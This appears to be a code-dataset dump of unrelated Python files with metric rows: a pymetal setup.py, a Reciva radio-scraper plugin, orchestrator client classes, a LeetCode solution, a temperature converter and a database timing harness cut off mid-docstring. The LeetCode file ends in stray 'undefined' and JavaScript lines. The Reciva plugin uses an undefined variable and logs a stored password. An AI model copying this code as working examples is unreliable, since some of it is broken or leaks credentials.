        self._fifo_queue_factory = fifo_queue_factory
        self._sequence_queue_factory = sequence_queue_factory

    def __call__(self, queue_type):
        """Return a new queue for queue_type; raise BbpypValueError otherwise."""
        if queue_type == QueueType.FIFO:
            return self._fifo_queue_factory()
        if queue_type == QueueType.SEQUENCE:
            return self._sequence_queue_factory()
        raise BbpypValueError("queue_type", queue_type, "unsupported queue type")
| 34.65 | 85 | 0.712843 | 81 | 693 | 5.654321 | 0.345679 | 0.209607 | 0.139738 | 0.131004 | 0.139738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.220779 | 693 | 19 | 86 | 36.473684 | 0.848148 | 0 | 0 | 0 | 0 | 0 | 0.046176 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05bf51d5a4d99bb71e1ff92fca3e542c34d1fe57 | 406 | py | Python | setup.py | OpenJarbas/pymetal | 33874ac4ad7ddbec3d80c44de3b3423baa8ce0c4 | [
"MIT"
] | 6 | 2020-03-27T12:08:06.000Z | 2021-05-16T06:55:04.000Z | setup.py | OpenJarbas/pymetal | 33874ac4ad7ddbec3d80c44de3b3423baa8ce0c4 | [
"MIT"
] | null | null | null | setup.py | OpenJarbas/pymetal | 33874ac4ad7ddbec3d80c44de3b3423baa8ce0c4 | [
"MIT"
] | 2 | 2020-08-16T16:36:27.000Z | 2022-02-13T00:58:07.000Z | from distutils.core import setup
# Packaging metadata for the pymetal distribution.
setup(
    name='pymetal',
    version='0.5.0',
    description='metal archives, dark lyrics api',
    url='https://www.github.com/OpenJarbas/pymetal',
    author='jarbasAi',
    author_email='jarbasai@mailfence.com',
    license='Apache2.0',
    packages=[],
    # Runtime dependencies pulled in on install.
    install_requires=[
        "requests",
        "bs4",
        "requests_cache",
        "random-user-agent",
        "lxml",
    ],
)
| 27.066667 | 58 | 0.633005 | 46 | 406 | 5.521739 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018519 | 0.20197 | 406 | 14 | 59 | 29 | 0.765432 | 0 | 0 | 0 | 0 | 0 | 0.416256 | 0.054187 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05c0d55b652a7ee2f8c5354d6b41642da6b9172d | 6,459 | py | Python | contrib/disabled/reciva.py | leigh123linux/streamtuner2 | 43ded3a68bcf3d968a99c849d779fc8c3fb3d8d8 | [
"MIT"
] | 1 | 2019-03-03T19:58:01.000Z | 2019-03-03T19:58:01.000Z | contrib/disabled/reciva.py | leigh123linux/streamtuner2 | 43ded3a68bcf3d968a99c849d779fc8c3fb3d8d8 | [
"MIT"
] | null | null | null | contrib/disabled/reciva.py | leigh123linux/streamtuner2 | 43ded3a68bcf3d968a99c849d779fc8c3fb3d8d8 | [
"MIT"
] | null | null | null | # encoding: UTF-8
# api: streamtuner2
# title: Reciva
# url: https://radios.reciva.com/
# description: Home internet radio app and diverse station database.
# version: 0.4
# type: channel
# category: radio
# config: -
# status: obsolete
# priority: contrib
# png:
# iVBORw0KGgoAAAANSUhEUgAAABAAAAAQBAMAAADt3eJSAAAAGFBMVEXiMATfORfhQyTrZk7uh3Tzs6n10879+/iUjtOkAAAAAWJLR0QAiAUdSAAAAAlwSFlzAAALEwAA
# CxMBAJqcGAAAAAd0SU1FB+AEBw4nI8D7wUYAAACISURBVAjXDc09D4JAFETREcParl/UvKdoKxi1JgZoiYnQSiJua2ST+ftud3KLGZDvYteT4DRTifqAFCvVmPBRl6um
# DsOWP1W5oUw42dQaFBu2lckqqJwxHg8Burx+u0WGXOW5nuoYZUhN6xMMKr03ryYMyj36WAee5OJaE7687R5zF8Cx2DvyD3ZIHyPRcAnIAAAAAElFTkSuQmCC
# extraction-method: dom, action-handler
#
# Reciva is a mobile app. They have a web directory though.
# It's a bit difficult to query, and streaming urls aren't
# directly accessible. But allows to fetch all stations from
# a category at once; so still a quick database.
#
# They probably have an API somewhere, but no public docs.
#
# You can optionally define a user account and password in
# `.netrc` (make a `machine reciva.com` entry) → which is
# going to be used implicitly.
#
import re
from pq import pq
import ahttp
import action
from config import *
from channels import *
# Reciva directory
class reciva (ChannelPlugin):
    """Station directory channel for radios.reciva.com (scrapes the web UI)."""
    # module attributes
    module = 'reciva'
    # Station URLs resolve to PLS playlists.
    listformat = "pls"
    has_search = True
    # Static fallback genre list; nested lists appear to be sub-genre groups —
    # update_categories() replaces all of this with a freshly scraped list.
    categories = ['60s', '70s', '80s', '90s', 'Adult', ['Adult Contemporary'], 'Alternative', 'Ambient', 'Bluegrass', 'Blues', 'Bollywood', 'Christian', ['Christian Contemporary'], 'Classic Rock', 'Classical', 'College', 'Comedy', 'Contemporary', 'Country', 'Dance', 'Discussion', 'Easy', 'Electronica', 'Experimental', 'Folk', 'Gospel', 'Greek', 'Hip Hop', 'Indian', 'Indie', ['Indie Rock'], 'Jazz', 'Jungle', 'Kids', 'Latin Hits', 'New Age', 'News', ['News Talk', 'News Updates'], 'Oldies', 'Pop', 'Public', 'Punk', 'Rap', 'Reggae', 'Religious', 'Rock', 'Short Wave Radio', 'Soft Rock', 'Spanish', 'Sports', 'Talk', 'Top 40', 'Unknown', 'Varied', 'World', ['World Africa', 'World Asia', 'World Caribbean', 'World Europe', 'World Mediterranean', 'World Middle East', 'World Tropical']]
    # Lower-cased genre title → reciva's numeric category id (used in base_url).
    catmap = { 'classical': '14', 'dance': '18', 'bluegrass': '52', 'contemporary': '16', 'pop': '34', 'spanish': '66', 'college': '15', 'rap': '38', 'ambient': '69', 'talk': '43', 'alternative': '9', 'religious': '39', 'blues': '10', 'folk': '23', 'classic rock': '13', '90s': '7', 'adult contemporary': '8', 'oldies': '33', 'indie rock': '54', 'electronica': '21', 'unknown': '45', 'discussion': '19', 'news talk': '31', 'world mediterranean': '55', 'sports': '42', 'new age': '51', 'indie': '27', 'indian': '65', 'easy': '20', '80s': '6', 'world africa': '67', 'comedy': '62', 'public': '35', 'jungle': '72', 'reggae': '48', 'world middle east': '50', 'christian': '11', 'world caribbean': '68', '60s': '58', 'world europe': '56', 'jazz': '28', '70s': '5', 'soft rock': '41', 'top 40': '44', 'adult': '57', 'news': '30', 'bollywood': '60', 'world tropical': '53', 'latin hits': '29', 'varied': '46', 'christian contemporary': '12', 'kids': '59', 'short wave radio': '73', 'world': '49', 'world asia': '47', 'country': '17', 'news updates': '32', 'punk': '36', 'greek': '25', 'hip hop': '26', 'rock': '40', 'gospel': '24', 'experimental': '22' }
    # Column titles for the station list: "playing" column holds the location.
    titles = dict( genre="Genre", title="Station", playing="Location", bitrate="Bitrate", listeners=False )
    # %s placeholders: (numeric category id, maximum station count).
    base_url = "https://radios.reciva.com/stations/genre/%s?&start=0&count=%s"
# update list
def update_categories(self):
self.categories = []
html = ahttp.get(self.base_url % (1, 1))
for c in re.findall('id="cg-(\d+)">([\w\d\s]+)</a></li>', html):
self.catmap[c[1].lower()] = c[0]
self.categories.append(c[1])
# fetchy fetch
    def update_streams(self, cat, search=None):
        """Fetch all stations of one category (or a search result) in one request.

        :param cat: genre title from self.categories; falsy → use `search`
        :param search: free-text query, only used when `cat` is empty
        :return: list of station dicts; "url" is a "urn:reciva:<id>" placeholder
                 that resolve_urn() swaps for the real stream URL on playback
        """
        entries = []
        if cat:
            html = ahttp.get(self.base_url % (self.catmap[cat.lower()], conf.max_streams))
        else: # search
            html = ahttp.get("https://radios.reciva.com/stations/search?q=%s&categories=&codec=&min_bitrate=&max_bitrate=&working=true&count=%s" % (search, conf.max_streams))
        if not html:
            log.ERR("No results from http://radios.reciva.com/ server. Their category browsing sometimes breaks. We're not using the search function as that would strain their server too much. You might try adding login credentials to `.netrc` - albeit that rarely helps.", html)
            return []
        # extract
        # Each odd/even-striped row of the #mytable listing is one station.
        for row in (pq(row) for row in pq(html).find("#mytable").find(".oddrow, .evenrow")):
            u = row.find(".streamlink")
            if u:
                # Numeric station id taken from the stream link's href.
                id = re.findall("(\d+)", u.attr("href"))[0]
                entries.append({
                    "title": row.find(".stationName").text(),
                    "id": id,
                    "url": "urn:reciva:%s" % id,
                    "homepage": "https://radios.reciva.com/station/%s" % id,
                    "playing": row.find(".stationLocation").text(),
                    "genre": row.find(".stationGenre").text(),
                    # NOTE(review): first 3 chars of .streamCodec presumably name
                    # the codec (e.g. "MP3") — confirm against live markup.
                    "format": mime_fmt(row.find(".streamCodec").text()[0:3]),
                    # Appending " 0" guarantees findall matches even when the
                    # codec text carries no bitrate digits.
                    "bitrate": int(re.findall("\d+", row(".streamCodec").text()[4:] + " 0")[0]),
                })
        # done
        return entries
# Fetch real `url` on stream access/playback (delay)
def resolve_urn(self, r):
if r["url"].startswith("urn:"):
id = r["url"].split(":")[2]
html = ahttp.get(
"https://radios.reciva.com/streamer?stationid=%s&streamnumber=0" % id,
timeout=4, quieter=True, statusmsg="Resolving actual stream URL for `%s`" % r["url"]
)
ls = re.findall("""(?:<iframe src=|iframe\()['"]([^'"]+)['"]""", html)
if ls:
r["url"] = ls[0]
else:
log.ERR("No stream found for reciva station #%s", row["id"])
return r
# Option login
    def init2(self, *p):
        """Plugin init hook: log in with `.netrc` credentials when present.

        Reads a `machine reciva.com` (or radios.reciva.com) entry via
        conf.netrc(); without one this quietly does nothing.
        """
        lap = conf.netrc(varhosts = ("reciva.com", "radios.reciva.com"))
        if lap:
            log.LOGIN("Reciva account:", lap)
            ahttp.get(
                "https://radios.reciva.com/account/login",
                {
                    # presumably a (login, account, password) triple from netrc
                    # — verify against conf.netrc()
                    "username": lap[0] or lap[1],
                    "password": lap[2]
                },
                timeout=2
| 53.380165 | 1,147 | 0.586004 | 754 | 6,459 | 5.005305 | 0.482759 | 0.023847 | 0.031797 | 0.031797 | 0.052994 | 0.036566 | 0.016958 | 0 | 0 | 0 | 0 | 0.042375 | 0.225422 | 6,459 | 120 | 1,148 | 53.825 | 0.711773 | 0.191051 | 0 | 0.028986 | 0 | 0.043478 | 0.410449 | 0.012339 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057971 | false | 0.014493 | 0.086957 | 0 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05c38eaa3065a8329a50e21ec13360c5ad6a7988 | 421 | py | Python | kaori/plugins/gacha/commands/test_analysis.py | austinpray/kizuna | b6f59b7d4a67ac68be65b75626e9f30c10f21e18 | [
"MIT"
] | 3 | 2018-04-18T04:52:50.000Z | 2019-11-07T18:47:43.000Z | kaori/plugins/gacha/commands/test_analysis.py | austinpray/kaori | b21c4146b9d0d27b87015cff0768138568a12e9c | [
"MIT"
] | 287 | 2020-04-21T02:39:47.000Z | 2022-03-28T13:11:59.000Z | kaori/plugins/gacha/commands/test_analysis.py | austinpray/kaori | b21c4146b9d0d27b87015cff0768138568a12e9c | [
"MIT"
] | 1 | 2020-10-22T00:20:43.000Z | 2020-10-22T00:20:43.000Z | import os
from .analysis import generate_report_charts
def test_report():
    """Smoke test: report charts are generated and non-empty."""
    from ..engine.test.cards import sachiko, matt_morgan, ubu, xss, balanced_S, low_dmg
    # Sample deck — ubu appears twice to exercise duplicates.
    cards = [sachiko, matt_morgan, ubu, ubu, xss, balanced_S, low_dmg]
    report = generate_report_charts(cards)
    # Seek each chart buffer to its end so tell() reports the byte size.
    for chart in report.values():
        chart.seek(0, os.SEEK_END)
    assert report['rarity'].tell() > 0
    assert report['natures'].tell() > 0
| 23.388889 | 87 | 0.686461 | 62 | 421 | 4.467742 | 0.516129 | 0.101083 | 0.144404 | 0.144404 | 0.151625 | 0.151625 | 0 | 0 | 0 | 0 | 0 | 0.00885 | 0.194774 | 421 | 17 | 88 | 24.764706 | 0.80826 | 0 | 0 | 0 | 1 | 0 | 0.030879 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05c9e68e31db7d2fa4d3a737415e47aa48ce8fa2 | 3,415 | py | Python | orpy/client/base.py | indigo-dc/orpy | 350439ce0188f19714c999b4ec7a2b8d507aa41b | [
"Apache-2.0"
] | 3 | 2019-06-07T15:26:25.000Z | 2020-02-03T16:53:59.000Z | orpy/client/base.py | indigo-dc/orpy | 350439ce0188f19714c999b4ec7a2b8d507aa41b | [
"Apache-2.0"
] | null | null | null | orpy/client/base.py | indigo-dc/orpy | 350439ce0188f19714c999b4ec7a2b8d507aa41b | [
"Apache-2.0"
] | 1 | 2020-03-09T11:38:00.000Z | 2020-03-09T11:38:00.000Z | # -*- coding: utf-8 -*-
# Copyright 2019 Spanish National Research Council (CSIC)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
class BaseObject(object):
    """Base class for every object representing an orchestrator resource."""

    def __init__(self, info):
        """Initialize the object.

        :param dict info: dictionary containing the object's information
        """
        self._info = {}
        self._add_details(info)
        # "uuid" is always present as an attribute, even when absent from info.
        self.uuid = info.get("uuid", None)

    def __repr__(self):
        # Render only the public (non-underscore) instance attributes, sorted.
        public = sorted(name for name in self.__dict__.keys() if name[0] != '_')
        details = ", ".join("%s=%s" % (name, getattr(self, name)) for name in public)
        return "<%s %s>" % (self.__class__.__name__, details)

    def _add_details(self, info):
        for key, value in info.items():
            try:
                setattr(self, key, value)
                self._info[key] = value
            except AttributeError:
                # The attribute is already defined on the class itself;
                # leave it untouched.
                pass

    def __getattr__(self, k):
        # Invoked only after regular attribute lookup has already failed.
        if k in self.__dict__:
            return self.__dict__[k]
        raise AttributeError(k)

    def __eq__(self, other):
        if not isinstance(other, BaseObject):
            return NotImplemented
        # Two resources of different concrete types are never equal.
        if not isinstance(other, self.__class__):
            return False
        # Prefer identity by "id" when both sides carry one.
        if hasattr(self, 'id') and hasattr(other, 'id'):
            return self.id == other.id
        return self._info == other._info

    def __ne__(self, other):
        # Negate "==" rather than __eq__ directly so that a NotImplemented
        # result still falls back to Python's default handling.
        return not self == other

    def set_info(self, key, value):
        """Store key/value in the object's information dict.

        :param key: the element to set
        :param value: the value for the element
        """
        self._info[key] = value

    def to_dict(self):
        """Translate the object into a dictionary.

        :return: a deep copy of the object's information
        :rtype: dict
        """
        return copy.deepcopy(self._info)

    def get(self, k, default=None):
        """Return attribute k, or `default` when it does not exist."""
        try:
            return self.__getattr__(k)
        except AttributeError:
            return default
class Deployment(BaseObject):
    """Object that represents a deployment."""
class Resource(BaseObject):
    """Object that represents a resource."""
class TOSCATemplate(BaseObject):
    """Object that represents a TOSCA template."""
class OrchestratorInfo(BaseObject):
    """Object that represents the Orchestrator information."""
class OrchestratorConfiguration(BaseObject):
    """Object that represents the Orchestrator configuration."""
| 29.439655 | 76 | 0.614934 | 412 | 3,415 | 4.93932 | 0.38835 | 0.027518 | 0.04914 | 0.058968 | 0.088452 | 0.057985 | 0.057985 | 0.057985 | 0 | 0 | 0 | 0.004139 | 0.292533 | 3,415 | 115 | 77 | 29.695652 | 0.838162 | 0.423133 | 0 | 0.188679 | 0 | 0 | 0.012555 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.169811 | false | 0.113208 | 0.018868 | 0.018868 | 0.490566 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
05d1503a50a40ab59c8577576303d29780043a35 | 583 | py | Python | Dataset/Leetcode/valid/98/709.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/valid/98/709.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/valid/98/709.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution:
def look(self, root, ret):
if root is None: return
self.look(root.left, ret)
ret.append(root.val)
self.look(root.right, ret)
def XXX(self, root: TreeNode) -> bool:
if not root: return True
ret = []
self.look(root, ret)
pre = ret[0]
for i in ret[1:]:
if i <= pre:
return False
pre = i
return True
undefined
for (i = 0; i < document.getElementsByTagName("code").length; i++) { console.log(document.getElementsByTagName("code")[i].innerText); }
| 25.347826 | 139 | 0.5506 | 76 | 583 | 4.223684 | 0.460526 | 0.074766 | 0.11215 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007576 | 0.320755 | 583 | 22 | 140 | 26.5 | 0.80303 | 0 | 0 | 0 | 0 | 0 | 0.013769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05d3a0c5abc905c3e0faa0df30324743d44e29f4 | 237 | py | Python | PRIMEIRO MUNDO - FIRST WORLD/Convertendo temperatura - 14.py | MatheusKlebson/Python-Course | c1c5404095601733057bd91a96b5b4c45f0b5b9a | [
"MIT"
] | null | null | null | PRIMEIRO MUNDO - FIRST WORLD/Convertendo temperatura - 14.py | MatheusKlebson/Python-Course | c1c5404095601733057bd91a96b5b4c45f0b5b9a | [
"MIT"
] | 1 | 2020-11-25T15:47:38.000Z | 2020-11-25T15:47:38.000Z | PRIMEIRO MUNDO - FIRST WORLD/Convertendo temperatura - 14.py | MatheusKlebson/Python-Course | c1c5404095601733057bd91a96b5b4c45f0b5b9a | [
"MIT"
] | null | null | null | #Exercício Python 014: Escreva um programa que converta uma temperatura digitando em graus Celsius
# converta para graus Fahrenheit.
# Read a temperature in degrees Celsius and convert it to Fahrenheit.
celsius = float(input("Temperatura em celsius: "))
fahrenheit = celsius * 9/5 + 32
print("Convertendo...", fahrenheit, "Em Fahrenheit")
| 39.5 | 98 | 0.742616 | 34 | 237 | 5.176471 | 0.735294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 0.14346 | 237 | 5 | 99 | 47.4 | 0.832512 | 0.544304 | 0 | 0 | 0 | 0 | 0.481132 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05d3a102efb6d11793798855b7fa90e66c7aee1d | 19,575 | py | Python | stand-alone-testing-of-alt-sql-from-proc-solns/python/proc-vs-top-level-sql-for-multi-stmt-txns/cmn.py | d-uspenskiy/tpcc | ed0311d73d8c1e7d1e055781522195964e5acdcb | [
"Apache-2.0"
] | 9 | 2020-01-22T20:21:32.000Z | 2021-06-30T02:36:45.000Z | stand-alone-testing-of-alt-sql-from-proc-solns/python/proc-vs-top-level-sql-for-multi-stmt-txns/cmn.py | d-uspenskiy/tpcc | ed0311d73d8c1e7d1e055781522195964e5acdcb | [
"Apache-2.0"
] | 44 | 2020-01-20T08:53:34.000Z | 2022-02-25T20:34:49.000Z | stand-alone-testing-of-alt-sql-from-proc-solns/python/proc-vs-top-level-sql-for-multi-stmt-txns/cmn.py | d-uspenskiy/tpcc | ed0311d73d8c1e7d1e055781522195964e5acdcb | [
"Apache-2.0"
] | 20 | 2020-04-24T23:24:21.000Z | 2022-01-13T03:58:35.000Z | import argparse
import psycopg2
import datetime
# ----------------------------------------------------------------------------------------
class DbSession:
    """Thin wrapper around a psycopg2 connection/cursor pair.

    Opens the connection in "repeatable read" isolation with autocommit on
    (explicit transactions are issued by callers via Stmts.start_txn/commit)
    and silences notice chatter with client_min_messages.
    """
    def __init__(self, params):
        # params.connect_str selects the PG (5432) or YB (5433) endpoint.
        self.session = psycopg2.connect(params.connect_str)
        self.session.set_session(isolation_level="repeatable read", autocommit=True)
        self.cur = self.session.cursor()
        self.cur.execute("set client_min_messages = warning")
    def execute(self, statement, the_vars=None):
        """Execute one statement; on any error roll back, report, and re-raise.

        :param statement: SQL text (may contain %s placeholders)
        :param the_vars: optional tuple of bind values for the placeholders
        """
        try:
            self.cur.execute(statement, the_vars)
        except psycopg2.DatabaseError as error:
            self.session.rollback()
            print(error.pgcode)
            print(error.pgerror)
            raise
        except Exception:
            self.session.rollback()
            print("\nUnexpected error")
            raise
    def close(self):
        # Idempotent: session is set to None so a second call is a no-op.
        if self.session is not None:
            self.cur.close()
            self.session.close()
            self.session = None
# ----------------------------------------------------------------------------------------
def parse_arguments():
    """Build and evaluate the experiment's command-line interface.

    :return: argparse.Namespace with db, mode, report_name, method,
             nr_rows_per_txn and nr_repeats (the numeric ones remain strings
             here; Params converts them to int later)
    """
    parser = argparse.ArgumentParser("proc vs top-level SQL elapsed time experiment")
    # (flag, options) table: one row per command-line switch, added in order.
    arg_table = [
        ("--db",
         dict(choices=["yb", "pg"],
              default="pg",
              help="yb: YugabyteDB, pg: PostgreSQL")),
        ("--mode",
         dict(choices=["one_shot", "all_successive", "all_interleaved", "create_tables", "do_timings_report"],
              default="one_shot",
              help="'db' always matters; 'nr_repeats' matters too for 'all_successive, all_interleaved'")),
        ("--report_name",
         dict(default="",
              help='optional name suffix for the "timings_report" filename. The default (empty string) means "use system-generated suffix"')),
        ("--method",
         dict(choices=["sql", "proc"],
              default="proc",
              help="""
        sql: many individual statements from client;
        proc: stored procedure
        """)),
        ("--nr_rows_per_txn",
         dict(default="1",
              help="Number of rows per txn")),
        ("--nr_repeats",
         dict(default="1",
              help="Number of repeats")),
    ]
    for flag, options in arg_table:
        parser.add_argument(flag, **options)
    return parser.parse_args()
# ----------------------------------------------------------------------------------------
def do_timings_report(sess, params):
    """Write the rows returned by the SQL "timings_report()" function to a file.

    The filename is "single-table-"/"many-tables-" (per params.approach)
    followed by params.report_name, or — when that is empty — a generated
    "<mode>-<db>.txt" suffix with underscores hyphenated.

    :param sess: DbSession-like object exposing execute() and a cur cursor
    :param params: Params-like object (approach, report_name, mode, db)
    """
    if params.approach == "s":
        fname = "single-table-"
    elif params.approach == "m":
        fname = "many-tables-"
    else:
        assert False, 'logic error: bad "approach"'
    if params.report_name != "":
        fname += params.report_name + ".txt"
    else:
        # When many separate "one_shot" invocations are used, the last step
        # is a dedicated "do_timings_report" invocation.
        mode = params.mode
        if mode == "do_timings_report":
            mode = "all-one-shots"
        # Replace possible arg-name underscores with hyphens for the filename.
        fname += (mode + "-" + params.db + ".txt").replace("_", "-")
    # Fix: use a context manager so the handle is closed even when the query
    # or a write raises (the original opened/closed manually and could leak).
    with open(fname, "w+") as f:
        sess.execute("select t from timings_report()")
        rows = sess.cur.fetchall()
        for row in rows:
            f.write(row[0] + "\n")
# ----------------------------------------------------------------------------------------
class Params:
    """One experiment run's configuration; converts the numeric string
    arguments to ints and maps the db flavor to a connection string."""

    # Connection strings keyed by database flavor:
    # PostgreSQL listens on 5432, YugabyteDB on 5433.
    _CONNECT_STRS = {
        "pg": "host=localhost dbname=demo user=u2 port=5432",
        "yb": "host=localhost dbname=demo user=u2 port=5433",
    }

    def __init__(self, db, approach, mode, report_name, method, nr_rows_per_txn_txt, nr_repeats_txt):
        # An unknown db leaves connect_str unset, matching the original
        # if/elif with no else branch.
        if db in self._CONNECT_STRS:
            self.connect_str = self._CONNECT_STRS[db]
        self.db = db
        self.approach = approach
        self.mode = mode
        self.report_name = report_name
        self.method = method
        self.nr_rows_per_txn = int(nr_rows_per_txn_txt, 10)
        self.nr_repeats = int(nr_repeats_txt, 10)
# ------------------------------------------------------------------------------------
class Stmts:
    """SQL statement texts used by StopWatch/prepare_sqls.

    Each "prepare_*" string creates a server-side prepared statement; the
    matching "execute_*" string runs it (with %s bind placeholders where the
    prepared statement takes parameters).
    """
    # Explicit transaction control (the connection itself is in autocommit).
    start_txn = "start transaction isolation level repeatable read"
    commit = "commit"
    # Allocate the next timing_tests primary key (locked with FOR UPDATE).
    prepare_select_timing_tests_next_k = """
        prepare select_timing_tests_next_k as
        select timing_tests_next_k from timing_tests_pk_values where k = 1 for update;
    """
    execute_select_timing_tests_next_k = "execute select_timing_tests_next_k"
    prepare_update_timing_tests_next_k = """
        prepare update_timing_tests_next_k as
        update timing_tests_pk_values set timing_tests_next_k = timing_tests_next_k + 1;
    """
    execute_update_timing_tests_next_k = "execute update_timing_tests_next_k"
    # Insert one timing_tests row describing a test run.
    prepare_insert_timing_tests = """
        prepare insert_timing_tests(int, timestamp, text, text, text, text, int, int) as
        insert into timing_tests(
          k,
          start_timestamp,
          db,
          approach,
          mode,
          method,
          nr_rows_per_txn,
          nr_repeats)
        values(
          $1,
          $2,
          $3,
          $4,
          $5,
          $6,
          $7,
          $8)
    """
    execute_insert_timing_tests = """
        execute insert_timing_tests(%s::int, %s::timestamp, %s::text, %s::text, %s::text, %s::text, %s::int, %s::int)"""
    # Allocate the next times primary key (same FOR UPDATE pattern as above).
    prepare_select_times_next_k = """
        prepare select_times_next_k as
        select times_next_k from timing_tests_pk_values where k = 1 for update;
    """
    execute_select_times_next_k = "execute select_times_next_k"
    prepare_update_times_next_k = """
        prepare update_times_next_k as
        update timing_tests_pk_values set times_next_k = times_next_k + 1;
    """
    execute_update_times_next_k = "execute update_times_next_k"
    # Insert one measured elapsed time, linked to its timing_tests row.
    prepare_insert_times = """
        prepare insert_times(int, int, timestamp, numeric) as
        insert into times(
          k,
          timing_tests_k,
          this_timestamp,
          measured_ms)
        values(
          $1,
          $2,
          $3,
          $4)
    """
    execute_insert_times = """
        execute insert_times(%s::int, %s::int, %s::timestamp, %s::numeric)
    """
# ------------------------------------------------------------------------------------
class StopWatch:
    """Records elapsed wall-clock times into the timing schema.

    Construction inserts one timing_tests row (allocating its key under an
    explicit transaction); each start()/stop() pair then inserts one times
    row with the measured milliseconds.
    """
    def __init__(self, sess, params):
        # Formal step: define all instance attributes here.
        self.sess = sess
        self.timing_tests_k = 0
        self.t_start = datetime.datetime.now()
        # Allocate this test's key: SELECT ... FOR UPDATE then bump the
        # counter, so concurrent runs cannot grab the same value.
        self.sess.execute(Stmts.start_txn)
        self.sess.execute(Stmts.execute_select_timing_tests_next_k)
        rows = self.sess.cur.fetchall()
        n = 0
        for row in rows:
            n += 1
        assert n == 1, "Unexpected: should be just one row"
        self.timing_tests_k = row[0]
        # NOTE(review): the update statement has no WHERE clause — fine while
        # timing_tests_pk_values holds only the single k = 1 row.
        self.sess.execute(Stmts.execute_update_timing_tests_next_k)
        self.sess.execute(Stmts.commit)
        self.sess.execute(Stmts.execute_insert_timing_tests,
            (
                self.timing_tests_k,
                self.t_start.strftime("%Y-%m-%d %H:%M:%S"),
                params.db,
                params.approach,
                params.mode,
                params.method,
                params.nr_rows_per_txn,
                params.nr_repeats),
            )
    def start(self):
        # Reset the reference instant for the next stop().
        self.t_start = datetime.datetime.now()
    def stop(self):
        # Record the times in milliseconds
        measured_ms = ((datetime.datetime.now() - self.t_start).total_seconds())*1000.0
        t_now = datetime.datetime.now()
        # Same key-allocation pattern as __init__, but for the times table.
        self.sess.execute(Stmts.start_txn)
        self.sess.execute(Stmts.execute_select_times_next_k)
        times_k = 0
        rows = self.sess.cur.fetchall()
        n = 0
        for row in rows:
            n += 1
        assert n == 1, "Unexpected: should be just one row"
        times_k = row[0]
        self.sess.execute(Stmts.execute_update_times_next_k)
        self.sess.execute(Stmts.commit)
        self.sess.execute(Stmts.execute_insert_times,
            (
                times_k,
                self.timing_tests_k,
                t_now.strftime("%Y-%m-%d %H:%M:%S"),
                measured_ms),
            )
# ----------------------------------------------------------------------------------------
def create_timings_tables_and_views(sess):
    """(Re)create the timing schema: the key-counter table, the
    timing_tests/times tables, the reporting views, and the
    speed_ratio()/timings_report() SQL functions.

